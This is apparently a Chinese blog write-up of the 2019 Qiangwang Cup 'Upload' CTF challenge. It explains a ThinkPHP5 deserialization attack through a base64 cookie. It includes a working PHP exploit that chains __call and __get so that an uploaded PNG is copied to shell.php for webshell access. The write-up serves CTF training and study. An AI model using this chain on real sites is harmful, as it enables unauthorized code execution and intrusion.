[强网杯 2019]Upload

最新推荐文章于 2023-11-12 23:00:01 发布
最新推荐文章于 2023-11-12 23:00:01 发布
阅读量595 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/126718764
版权 
知识点:代码审计

可以看到cookie值是base64加密后的。
在这里插入图片描述
解密后:
在这里插入图片描述
试了一下改img的地址并不会目录穿越,那么这题大概率是反序列化,先扫一波,发现www.tar.gz

有idea说明会有配置信息,和一些历史记录。
在这里插入图片描述
作者给了两个断点提示我们。
在这里插入图片描述
在这里插入图片描述
可以从$profile=cookie('user');看出,确实是利用cookie。

接下来看一下上传图片的代码:
在这里插入图片描述
主要功能就是先判断我们的信息和之前的一不一样,不一样就重定向到首页,再判断文件是不是图片,然后把文件copy后移到upload下。

可以利用copy把.png转化为.php复制到目录下。那么怎么调用这个类中的upload_img方法?

在profile类中有两个方法__get和__call方法,__get方法是当访问不可访问的属性时调用,__call是访问不可访问的方法的时候调用。

在这里插入图片描述

这时候再回头看作者给的第二个断点,利用 $this->checker->index();触发__call,这时候在__call中又会调用不存在的方法index,触发了__get。我们设置$except = ['index' => 'upload_img'],这样就会调用upload_img方法了。
在这里插入图片描述

exp:

<?php
namespace app\web\controller;
class Profile
{
    public $checker = 0;
    public $filename_tmp = './upload/c47b21fcf8f0bc8b3920541abd8024fd/10fb15c77258a991b0028080a64fb42d.png';
    public $filename = './upload/c47b21fcf8f0bc8b3920541abd8024fd/shell.php';
    public $upload_menu;
    public $ext = 1;
    public $img;
    public $except = ['index' => 'upload_img'];

}

class Register
{
    public $checker;
    public $registed = 0;
}

$profile = new profile();
$register = new Register();
$register->checker = $profile;

echo base64_encode(serialize($register));
?>

然后修改一下cookie,png文件就会变为php文件,最后用蚁剑连一下就ok了。

在这里插入图片描述
在这里插入图片描述

succ3
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
反序列化(强网杯2019UPLOAD
kid的博客
05-29 5841
反序列化(强网杯2019UPLOAD) 前言 这里主要是复现一下强网杯2019web的第一题,UPLOAD。这是一道反序列化的题,反正我觉得挺难的,当时已经锁定了反序列化的方向也没能完成… 感谢大佬提供的复现环境:https://github.com/CTFTraining/qwb_2019_upload UPLOAD 进入靶场后首先是一个登陆注册页面 这里很自然的要想到有没有注入,简单的万能...
2019强网杯upload
m0_61448651的博客
07-21 623
2019强网杯upload
[BUUCTF][强网杯 2019]Upload
cosmoslin的博客
01-22 1832
考点 代码审计 反序列化 解题 信息搜集 首先打开是一个登录框,尝试sql无果 注册登录,发现一个文件上传页面 先试试文件上传,会将jpg文件转换为png,文件名随机生成 dirsearch扫一下目录,有备份文件www.tar.gz 解压后是一个tp5的框架 代码审计 打开文件后有两个断点 application/web/controller/Index.php 在访问大部分页面时都会调用到login_check方法,该方法将传入的用户信息反序列化,再到数据库中进行检查 application/web
强网杯-upload1
08-08
在"强网杯-upload1"这个挑战中,我们面对的是一个网络安全相关的解题任务。题目提供的数据是一个名为"data.pcapng"的网络流量捕获文件,这类文件通常用于分析网络通信中的数据包。使用Wireshark这样的网络封包分析...
upload2019.rar
06-25
upload-2019,该环境是用于练习文件上传漏洞的,通过该环境的练习能够使自己更加牢固的掌握文件上传的漏洞原理以及运用
安装upload-labs
10-22
安装upload-labs 安装upload-labs是网安入门教程系列的一部分,旨在帮助初学者学习文件上传漏洞的基础知识和实践经验。在这篇文章中,我们将一步步指导您如何安装upload-labs靶场,以便更好地学习文件上传漏洞。 ...
upload file package
07-13
upload file package
upload插件
05-11
upload的扩展插件,直接用,很方便,如果需要这一插件的可以看一下。
[强网杯 2019]Upload wp
qq_41891666的博客
07-16 1543
0x00 前言 本来是在刷 文件上传的题,然后没想到强网杯这个题打着upload 的幌子其实是个反序列化题,看了看wp 后,觉得很有意思,值得记录一下 0x01 题解 1.首先用户登录后的 cookie 是一串加密的内容,很可疑,base64 解密之后,发现是序列化的内容 2.dirmap 扫目录,扫到源码,/www.tar.gz 下载之后发现里面包含源码,以及.idea 文件,phpstorm 打开发现断点,估计是出题人故意留的提示 3.审计源码 先看两个断点处: login_check() 函数
BUUCTF:[强网杯 2019]Upload
末初的CSDN博客
03-27 3192
参考:https://www.zhaoj.in/read-5873.html 稍微测试了一下,不存在注入或者万能密码登录,先注册登录 先传一句话木马图片上去看看 上传的是一张jpg的图片,传上去之后被改后缀为png,而且可以看到路径和文件名都进行了重命名使用md5值 目录扫描出一个www.tar.gz在网站根目录,使用phpstorm打开,发现是ThinkPHP5框架 而且存在....
第四届强网杯-upload
鸣蜩十四的博客
08-25 260
在下载好附件之后,我们可以看见这是一个pcapng文件,我们可以把他导入wireshark中进行分析 我们可以看出数据当中是有一张图片存在的,我们可以把图片提取出来,进一步分析 在检查数据当中,我们可以发现中间有一条数据是steghide.php 可以明显看出使用steghide工具对图片进行分离文本操作,并且密码是一个简单的密码,,我们可以对其进行爆破,最后爆出来密码是123456 最后打开flag.txt就获得flag了 ...
[强网杯 2019]Upload 反序列化结合文件上传
scrawman的博客
12-05 1155
[强网杯 2019]Upload www.tar.gz发现源码,文件还有点大,是把整个工程文件都上传了。 用phpstrom打开的话会有断点提示,一处是在Register.php,另一处是在Index.php,是在提示我们用cookie传序列化字符串。 重点在Profile.php,毕竟文件上传都是在这里控制的,看到两个魔术方法__call和__get。调用本类中没有的方法触发__call,调用this->{$name},如果本类中也没有这个属性,调用__get。 再倒回去看index.php中
强网杯 2019 Upload(代码审计、反序列化、thinkphp5,附代码审计详解)
最新发布
2301_76690905的博客
11-12 140
首先看到登录和注册页面,爆破了一下admin登录界面无事发生,注册后登录看见一个上传头像的上传点(不知道是不是容器原因,上传完第一次后上传不了第二次一直显示连接不上),扫了下目录扫出一些文件,其中有用的是www.tar.gz打开压缩包能看见是th5,查看查看看到其定义的路由都指向了这个模块,该模块下共有四个控制器(四个文件的审计在最后)关键的点在于:Index.php中的login_check()中,有一处使用了反序列化,并且没有进行任何过滤寻找别的魔术方法Register.php中:Profile.php
2019强网杯web upload分析
a3uRa的一个窝
06-01 1198
<?php namespace app\web\controller; use think\Controller; class Register extends Controller { public $checker; public $registed; public function __construct() { $this->...
强网杯2019线上赛-web
wyj_1216 House
05-29 1488
web1 upload |Solved 通过信息搜集可以得到泄露的源码,然后进行代码审计,是一个tp5的框架,代码审计,直接到核心的应用类去审计 抓包发现如下问题 cookie 是base64 的序列化值 相应的还有反序列化的值 在register 里面发现了一个call函数 可以对变量赋值 上传的函数中发现copy函数 绕过ext 就能执行copy函数 把图片木马copy成webshell。 ...
php upload ctf,强网杯CTF防御赛ez_upload Writeup
05-14
move_uploaded_file($_FILES["upload"]["tmp_name"], "upload/" . $_FILES["upload"]["name"]); echo "Stored in: " . "upload/" . $_FILES["upload"]["name"]; } ?> ``` 从上述代码中我们可以发现,这是一个文件...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值